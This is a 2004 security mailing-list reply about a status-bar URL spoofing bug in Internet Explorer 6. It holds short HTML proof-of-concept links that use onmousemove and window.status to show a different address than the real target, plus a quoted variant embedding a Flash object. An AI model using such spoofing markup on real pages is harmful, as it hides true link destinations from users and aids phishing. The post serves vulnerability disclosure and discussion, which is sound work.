Re: New URL spoofing bug in Microsoft Internet Explorer
I thought this was obvious, but having seen the amount of discussion,
here's another URL spoofer:
<a href="http://www.google.com"
onmousemove="window.status='http://www.msn.com';"
onmouseout="window.status='Done.';">Visit Msn!</a>
note that
<a href="http://www.google.com"
onmouseover="window.status='http://www.msn.com';"
onmouseout="window.status='Done.';">Visit Msn!</a>
won't work - it seems MS have already half fixed this....
(tested on MSIE 6.0, winXP)
On 8 Nov 2004 23:30:55 -0000, roozbeh afrasiabi
<roozbeh_afrasiabi@xxxxxxxxx> wrote:
> In-Reply-To: <005401c4bd36$6fdf3800$d9ebb9d9@oemcomputer>
>
> Here is another way of spoofing the status bar:
>
> <a> tag + <object> tag
>
> <!--A HREF=http://www.yahoo.com><!--OBJECT
> classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
>
> codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0"
>
> WIDTH="300" HEIGHT="50" id="link" ALIGN="">
>
> <PARAM NAME=movie VALUE="link.swf"> <PARAM NAME=quality VALUE=high > <PARAM
> NAME=bgcolor VALUE=#FFFFFF> <PARAM NAME=menu
>
> VALU=FALSE>
>
> <EMBED src="link.swf" quality=high bgcolor=#FFFFFF WIDTH="300" HEIGHT="50"
> NAME="link" ALIGN=""
>
> TYPE="application/x-shockwave-flash"
> PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
>
> </a></OBJECT></a>
>
> *this method of spoofing the status bar allows malicious users to hide the
> target url from suspecting ppl ,demo page uses flash to generate
>
> random urls.
>
> demo:
>
> http://www.persiax.com/pocs/statusbar/status.htm
>
>
--
PHP, mySQL Security and more at http://www.puremango.co.uk